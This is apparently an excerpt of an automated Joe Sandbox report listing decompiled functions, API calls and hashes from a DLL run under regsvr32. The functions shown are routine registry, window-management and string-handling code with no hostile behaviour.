Instruction ID: a2ae81d17b3836938449f0d7d2ed1cca9f104e75912b5b0e690989478841b790
Opcode Fuzzy Hash: b8b1eeed81c04e6fecac091b111437136b9e607d5844ee97acd8fccc3fa65122
Instruction Fuzzy Hash: BC415B74644301AFE320DF14CC86F2AB7E4FB85B40F54481AFA549B2D1D7B1E945CB66

Uniqueness

Uniqueness Score: -1.00%

Function 10063423 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10063423(void* __ecx, void* __eflags) {
				intOrPtr _t36;
				void* _t37;
				void* _t42;
				intOrPtr* _t61;
				void* _t79;
				void* _t84;

				E1001A9E0(0x10076a20, _t84);
				_t79 = __ecx;
				 *(_t84 - 0x14) = 0;
				_t36 = L10053B9C(__ecx);
				 *((intOrPtr*)(_t84 - 0x1c)) = _t36;
				if(_t36 != 0) {
					do {
						_t61 = L10053BAE(_t79, _t84 - 0x1c);
						if(_t61 != 0) {
							 *((intOrPtr*)( *_t61 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *((intOrPtr*)(_t84 - 0x1c)) != 0);
				}
				if( *((intOrPtr*)(_t79 + 0x7c)) != 0) {
					E1004598C(_t84 - 0x10, _t84, "Software\\");
					 *(_t84 - 4) = 0;
					E10045CFA(_t84 - 0x10,  *((intOrPtr*)(_t79 + 0x7c)));
					_push(0x1007ba6c);
					_push(_t84 - 0x10);
					_push(_t84 - 0x20);
					_t42 = E10045BB3(_t84 - 0x10);
					_push( *((intOrPtr*)(_t79 + 0x90)));
					 *(_t84 - 4) = 1;
					_push(_t42);
					_push(_t84 - 0x18);
					E10045BB3(_t84 - 0x10);
					 *(_t84 - 4) = 3;
					E1004591E(_t84 - 0x20);
					E10063552(0x80000001, _t84 - 0x18);
					if(RegOpenKeyA(0x80000001,  *(_t84 - 0x10), _t84 - 0x14) == 0) {
						if(RegEnumKeyA( *(_t84 - 0x14), 0, _t84 - 0x12c, 0x104) == 0x103) {
							E10063552(0x80000001, _t84 - 0x10);
						}
						RegCloseKey( *(_t84 - 0x14));
					}
					RegQueryValueA(0x80000001,  *(_t84 - 0x18), _t84 - 0x12c, _t84 - 0x24);
					 *(_t84 - 4) = 0;
					E1004591E(_t84 - 0x18);
					 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
					E1004591E(_t84 - 0x10);
				}
				_t37 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t37;
			}

0x10063428
0x10063437
0x10063439
0x1006343c
0x10063443
0x10063446
0x10063448
0x1006344e
0x10063455
0x10063460
0x10063460
0x10063463
0x10063448
0x1006346b
0x1006347a
0x10063485
0x10063488
0x10063490
0x10063495
0x10063499
0x1006349a
0x1006349f
0x100634a5
0x100634a9
0x100634ad
0x100634ae
0x100634b6
0x100634ba
0x100634cb
0x100634e0
0x100634fd
0x10063506
0x10063506
0x1006350e
0x1006350e
0x10063523
0x1006352c
0x1006352f
0x10063534
0x1006353b
0x10063540
0x10063546
0x10063549
0x10063551

APIs

__EH_prolog.LIBCMT ref: 10063428
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 100634D8
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 100634F2
RegCloseKey.ADVAPI32(?), ref: 1006350E
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 10063523

Strings

Software\, xrefs: 10063472

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prologOpenQueryValue
String ID: Software\
API String ID: 2161548231-964853688
Opcode ID: e24c75a5275721ed01beb90e4080e9f3cb596faee8e45c488e1b29fce05fd6d2
Instruction ID: 5a8418dd0ddd876643bed7d86fcffc9fa470f92b869443a2d37e6fd842ab8686
Opcode Fuzzy Hash: e24c75a5275721ed01beb90e4080e9f3cb596faee8e45c488e1b29fce05fd6d2
Instruction Fuzzy Hash: F6315AB590051AAFDF05DBA4CC85AEEBBB9FF08310F10416AF512E3191DB35AA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10015CEA Relevance: 10.6, APIs: 7, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10015CEA(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t37;
				signed char _t39;
				intOrPtr _t42;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t47;

				_t40 = __ecx;
				_t37 = __ebx;
				_t42 =  *((intOrPtr*)(_t47 + 0x10));
				if(_t42 == 0) {
					_t46 =  *((intOrPtr*)(_t47 + 0x10));
					L13:
					_t43 = E10041F78(_t46, GetTopWindow( *(_t46 + 0x1c)));
					if(_t43 != 0) {
						L6:
						_push(_t37);
						if((GetWindowLongA( *(_t43 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L17:
							return _t43;
						}
						_t39 =  *(_t47 + 0x1c);
						if((_t39 & 0x00000001) == 0 || IsWindowVisible( *(_t43 + 0x1c)) != 0) {
							if((_t39 & 0x00000002) == 0) {
								L15:
								_push(_t39);
								_push(0);
								_push(_t43);
								goto L16;
							}
							_t40 = _t43;
							if(E100454E0(_t43) != 0) {
								goto L15;
							}
							goto L11;
						} else {
							L11:
							_push(_t39);
							_push(_t43);
							_push(_t46);
							L16:
							_t43 = E10015CEA(_t39, _t40);
							goto L17;
						}
					}
					return _t46;
				}
				_t28 = E10041F78(_t45, GetWindow( *(_t42 + 0x1c), 2));
				_t46 =  *((intOrPtr*)(_t47 + 0x10));
				if(_t28 != 0) {
					L5:
					_t43 = E10041F78(_t46, GetWindow( *(_t42 + 0x1c), 2));
					goto L6;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t42 = E10015C91(_t46, E10041F78(_t46, GetParent( *(_t42 + 0x1c))));
					if(_t42 == 0 || _t42 == _t46) {
						goto L13;
					}
					if(E10041F78(_t46, GetWindow( *(_t42 + 0x1c), 2)) == 0) {
						continue;
					}
					goto L5;
				}
				goto L13;
			}

0x10015cea
0x10015cea
0x10015cec
0x10015cf3
0x10015d95
0x10015d99
0x10015da8
0x10015dac
0x10015d57
0x10015d57
0x10015d68
0x10015dbd
0x00000000
0x10015dbf
0x10015d6a
0x10015d71
0x10015d83
0x10015db2
0x10015db2
0x10015db3
0x10015db5
0x00000000
0x10015db5
0x10015d85
0x10015d8e
0x00000000
0x00000000
0x00000000
0x10015d90
0x10015d90
0x10015d90
0x10015d91
0x10015d92
0x10015db6
0x10015dbb
0x00000000
0x10015dbb
0x10015d71
0x00000000
0x10015dae
0x10015d08
0x10015d0f
0x10015d13
0x10015d47
0x10015d55
0x00000000
0x00000000
0x00000000
0x00000000
0x10015d15
0x10015d15
0x10015d2b
0x10015d2f
0x00000000
0x00000000
0x10015d45
0x00000000
0x00000000
0x00000000
0x10015d45
0x00000000

APIs

GetWindow.USER32(?,00000002), ref: 10015D05
GetParent.USER32(?), ref: 10015D18

Part of subcall function 10015C91: GetWindowLongA.USER32(?,000000F0), ref: 10015CA9
Part of subcall function 10015C91: GetParent.USER32(?), ref: 10015CC2
Part of subcall function 10015C91: GetWindowLongA.USER32(?,000000EC), ref: 10015CD5

GetWindow.USER32(?,00000002), ref: 10015D3B
GetWindow.USER32(?,00000002), ref: 10015D4D
GetWindowLongA.USER32(?,000000EC), ref: 10015D5D
IsWindowVisible.USER32(?), ref: 10015D76
GetTopWindow.USER32(?), ref: 10015D9C

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Long$Parent$Visible
String ID:
API String ID: 3473418232-0
Opcode ID: b5c67ba2e75ccb79a5a675de66530a99db9fb642151762ca7f4d60bd7f7c68b2
Instruction ID: 524e828d8762e48476deed7d723a10f4f16b0bc82a8095ea4decb069956648a3
Opcode Fuzzy Hash: b5c67ba2e75ccb79a5a675de66530a99db9fb642151762ca7f4d60bd7f7c68b2
Instruction Fuzzy Hash: 72219032600721ABD731DB65AC0DF5B77ACEF40282F5A0528F951DF191D732EC8587A0

Uniqueness

Uniqueness Score: -1.00%

Function 10047A12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10047A12(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				CHAR* _t22;
				CHAR* _t23;
				int _t32;
				CHAR* _t34;
				intOrPtr _t36;
				CHAR* _t41;
				void* _t45;
				void* _t48;

				_t41 = _a4;
				_t32 = lstrlenA(_t41);
				_t22 = E10066C2D(_t41, 0, 0) - 1;
				_t45 = _t32 - _t22;
				_a4 = _t22;
				_t36 = _t45 + _t41;
				_v8 = _t36;
				if(_a8 < _t32) {
					if(_a8 >= _t22) {
						_t34 =  &(_t41[2]);
						if( *_t41 == 0x5c && _t41[1] == 0x5c) {
							while( *_t34 != 0x5c) {
								_t34 = E1001B7D0(_t34);
							}
						}
						if(_t45 > 3) {
							do {
								_t34 = E1001B7D0(_t34);
							} while ( *_t34 != 0x5c);
						}
						_t23 = _a4;
						_t48 = _t34 - _t41;
						_t12 =  &(_t23[5]); // 0x5
						if(_a8 >= _t48 + _t12) {
							while(lstrlenA(_t34) + _t48 + 4 > _a8) {
								do {
									_t34 = E1001B7D0(_t34);
								} while ( *_t34 != 0x5c);
							}
							 *(_t48 + _t41) =  *(_t48 + _t41) & 0x00000000;
							lstrcatA(_t41, "\...");
							_t22 = lstrcatA(_t41, _t34);
						} else {
							_push(_v8);
							goto L13;
						}
					} else {
						if(_a12 == 0) {
							_t36 = 0x10094898;
						}
						_push(_t36);
						L13:
						_t22 = lstrcpyA(_t41, ??);
					}
				}
				return _t22;
			}

0x10047a19
0x10047a28
0x10047a2f
0x10047a32
0x10047a37
0x10047a3a
0x10047a3d
0x10047a40
0x10047a49
0x10047a5c
0x10047a5f
0x10047a67
0x10047a73
0x10047a73
0x10047a67
0x10047a7a
0x10047a7c
0x10047a82
0x10047a85
0x10047a7c
0x10047a8a
0x10047a8f
0x10047a91
0x10047a98
0x10047aa6
0x10047ab6
0x10047abc
0x10047abf
0x10047ac4
0x10047ac6
0x10047ad6
0x10047ada
0x10047a9a
0x10047a9a
0x00000000
0x10047a9a
0x10047a4b
0x10047a4f
0x10047a51
0x10047a51
0x10047a56
0x10047a9d
0x10047a9e
0x10047a9e
0x10047a49
0x10047ae0

APIs

lstrlenA.KERNEL32(?), ref: 10047A1D

Part of subcall function 10066C2D: lstrlenA.KERNEL32(?,?,?,10047A2F,?,00000000,00000000), ref: 10066C64

lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10047A9E
lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10047AA7
lstrcatA.KERNEL32(?,\...), ref: 10047AD6
lstrcatA.KERNEL32(?,?), ref: 10047ADA

Strings

\..., xrefs: 10047AD0

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: lstrlen$lstrcat$lstrcpy
String ID: \...
API String ID: 2778582283-1167917071
Opcode ID: 74da75f35030ab81f9551adf11da56af5f68bbfe3d3bce1b40e617dea63051e1
Instruction ID: bc2b3a03c51432ff8cdf64b296798285414bfee5b7d49ea9c66d94c92763d50b
Opcode Fuzzy Hash: 74da75f35030ab81f9551adf11da56af5f68bbfe3d3bce1b40e617dea63051e1
Instruction Fuzzy Hash: EE21057180079ABEE721DB608C84F5F7BE8FB892D1F21403AE50DD6042E774EA508B56

Uniqueness

Uniqueness Score: -1.00%

Function 10039DA6 Relevance: 10.6, APIs: 7, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10039DA6(intOrPtr* __ecx) {
				int _t31;
				long _t32;
				void* _t40;
				int _t41;
				int _t43;
				void* _t49;
				intOrPtr* _t50;
				void* _t55;

				E1001A9E0(0x10076fb0, _t55);
				_t50 = __ecx;
				_t31 =  *((intOrPtr*)( *__ecx + 0xd0))();
				__imp__#14( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(_t55 + 0xc)),  *(_t55 + 0x10), 1, 0xffffffff, _t49, _t40, __ecx);
				_t41 =  *(_t55 + 8);
				 *(_t55 + 0x10) = _t31;
				if(_t41 != 0xffffffff && _t31 != 0xffffffff && _t31 != _t41 && _t31 != _t41 + 1) {
					_t32 =  *0x1008f630; // 0x1008f644
					 *(_t55 - 0x10) = _t32;
					 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
					L1005FC55(__ecx, _t41, _t55 - 0x10);
					 *(_t55 + 8) = SendMessageA( *(_t50 + 0x1c), 0x199, _t41, 0);
					SendMessageA( *(_t50 + 0x1c), 0x182, _t41, 0);
					if(_t41 <  *(_t55 + 0x10)) {
						 *(_t55 + 0x10) =  *(_t55 + 0x10) - 1;
					}
					_t43 = SendMessageA( *(_t50 + 0x1c), 0x181,  *(_t55 + 0x10),  *(_t55 - 0x10));
					SendMessageA( *(_t50 + 0x1c), 0x19a, _t43,  *(_t55 + 8));
					SendMessageA( *(_t50 + 0x1c), 0x186, _t43, 0);
					 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
					_t31 = E1004591E(_t55 - 0x10);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t31;
			}

0x10039dab
0x10039db3
0x10039db9
0x10039dca
0x10039dd0
0x10039dd3
0x10039dd9
0x10039df7
0x10039dfd
0x10039e00
0x10039e0b
0x10039e2b
0x10039e31
0x10039e36
0x10039e38
0x10039e38
0x10039e4e
0x10039e59
0x10039e66
0x10039e68
0x10039e6f
0x10039e74
0x10039e7a
0x10039e82

APIs

__EH_prolog.LIBCMT ref: 10039DAB
#14.COMCTL32(?,?,?,00000001), ref: 10039DCA
SendMessageA.USER32 ref: 10039E21
SendMessageA.USER32 ref: 10039E31
SendMessageA.USER32 ref: 10039E49
SendMessageA.USER32 ref: 10039E59
SendMessageA.USER32 ref: 10039E66

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$H_prolog
String ID:
API String ID: 1044275984-0
Opcode ID: e8e3ade67c0518fc9b574f47c42ffbabc0b54d29d6467d3b0686fc8799967ff1
Instruction ID: 0f395ed8dcba434cd95eb1c0d0411b2241666b99fb0db8c9ea91c6b30d58dea7
Opcode Fuzzy Hash: e8e3ade67c0518fc9b574f47c42ffbabc0b54d29d6467d3b0686fc8799967ff1
Instruction Fuzzy Hash: FE213E71900619BFEB11CF94CC85FAD7B75FF08364F208629F5299A1E0CB71AD619B90

Uniqueness

Uniqueness Score: -1.00%

Function 10039EAA Relevance: 10.6, APIs: 7, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10039EAA(void* __ecx) {
				void* _t34;
				void* _t35;
				void* _t49;
				void* _t69;
				void* _t72;
				void* _t74;

				_t34 = E1001A9E0(0x10076fcc, _t74);
				_t79 =  *(_t74 + 8) - 0xffffffff;
				_t72 = __ecx;
				if( *(_t74 + 8) != 0xffffffff) {
					_t35 = L10060006(_t79);
					GetClientRect( *(_t72 + 0x1c), _t74 - 0x24);
					 *(_t74 - 0x10) =  *(_t74 - 0x10) & 0x00000000;
					 *((intOrPtr*)(_t74 - 0x14)) = 0x1007d104;
					 *(_t74 - 4) =  *(_t74 - 4) & 0x00000000;
					L1004F919(_t74 - 0x14, CreateRectRgnIndirect(_t74 - 0x24));
					_push(GetDC( *(_t72 + 0x1c)));
					_t69 = L1004E61D();
					L1004ED03(_t69, _t74 - 0x14);
					SendMessageA( *(_t72 + 0x1c), 0x198,  *(_t74 + 8), _t74 - 0x24);
					 *(_t74 - 0x20) =  *(_t74 - 0x20) - 2;
					 *((intOrPtr*)(_t74 - 0x18)) =  *(_t74 - 0x20) + 2;
					_t49 = L1004E844(_t69, _t35);
					PatBlt( *(_t69 + 4),  *(_t74 - 0x24),  *(_t74 - 0x20),  *((intOrPtr*)(_t74 - 0x1c)) -  *(_t74 - 0x24),  *((intOrPtr*)(_t74 - 0x18)) -  *(_t74 - 0x20), 0x5a0049);
					L1004E844(_t69, _t49);
					ReleaseDC( *(_t72 + 0x1c),  *(_t69 + 4));
					 *((intOrPtr*)(_t74 - 0x14)) = 0x1007b764;
					 *(_t74 - 4) = 1;
					_t34 = L1004F970(_t74 - 0x14);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t74 - 0xc));
				return _t34;
			}

0x10039eaf
0x10039eb7
0x10039ebc
0x10039ebe
0x10039ec6
0x10039ed4
0x10039eda
0x10039ede
0x10039ee5
0x10039ef7
0x10039f05
0x10039f0b
0x10039f13
0x10039f27
0x10039f30
0x10039f3a
0x10039f3d
0x10039f60
0x10039f69
0x10039f74
0x10039f7a
0x10039f84
0x10039f8b
0x10039f91
0x10039f96
0x10039f9e

APIs

__EH_prolog.LIBCMT ref: 10039EAF
GetClientRect.USER32 ref: 10039ED4
CreateRectRgnIndirect.GDI32(?), ref: 10039EED
GetDC.USER32(?), ref: 10039EFF
SendMessageA.USER32 ref: 10039F27
PatBlt.GDI32(?,005A0049,00000002,?,00000002,005A0049), ref: 10039F60
ReleaseDC.USER32(?,?), ref: 10039F74

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$ClientCreateH_prologIndirectMessageReleaseSend
String ID:
API String ID: 1398832504-0
Opcode ID: 3a93a8a9e0b76698d384df6427964f991b300bbbcffa86de3e494601aa9e4f39
Instruction ID: ea5cdd98dbc4de1509532ea29e940b4644751333216510c898fe6124d546fc36
Opcode Fuzzy Hash: 3a93a8a9e0b76698d384df6427964f991b300bbbcffa86de3e494601aa9e4f39
Instruction Fuzzy Hash: 29210A76900219AFDF15DFE4CD89AEEBBB9FF08301F10412AE106E2151DB75AE04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1002C140 Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002C140(struct HWND__* _a4, signed int _a8) {
				struct tagRECT _v16;
				signed int _t30;
				intOrPtr _t39;
				signed char _t43;
				struct HWND__* _t49;
				struct HWND__* _t50;
				signed int _t51;

				_t49 = _a4;
				GetWindowRect(_t49,  &_v16);
				_t30 = GetWindowLongA(_t49, 0xfffffff0);
				_t51 = _t30;
				if((_t30 & 0x10000000) == 0) {
					L12:
					return _t30;
				}
				_t30 = _a8;
				if(_t30 == 0) {
					L9:
					InflateRect( &_v16, 1, 1);
					_t50 = GetParent(_t49);
					ScreenToClient(_t50,  &_v16);
					ScreenToClient(_t50,  &(_v16.right));
					if((_t51 & 0x00200000) != 0) {
						_v16.right.x = _v16.right.x + 1;
					}
					return InvalidateRect(_t50,  &_v16, 0);
				}
				_t43 =  *(_t30 + 0x18);
				if((_t43 & 0x000000c0) != 0 || (_t43 & 0x00000002) == 0 || (_t43 & 0x00000001) == 0) {
					if((_t43 & 0x00000003) == 2 && _v16.right.x -  *((intOrPtr*)(_t30 + 0x10)) == _v16.left) {
						_t39 =  *((intOrPtr*)(_t30 + 0x14));
						if(_v16.bottom - _v16.top >= _t39) {
							_v16.top = _v16.top + _t39 + 1;
						}
					}
					goto L9;
				} else {
					goto L12;
				}
			}

0x1002c14a
0x1002c150
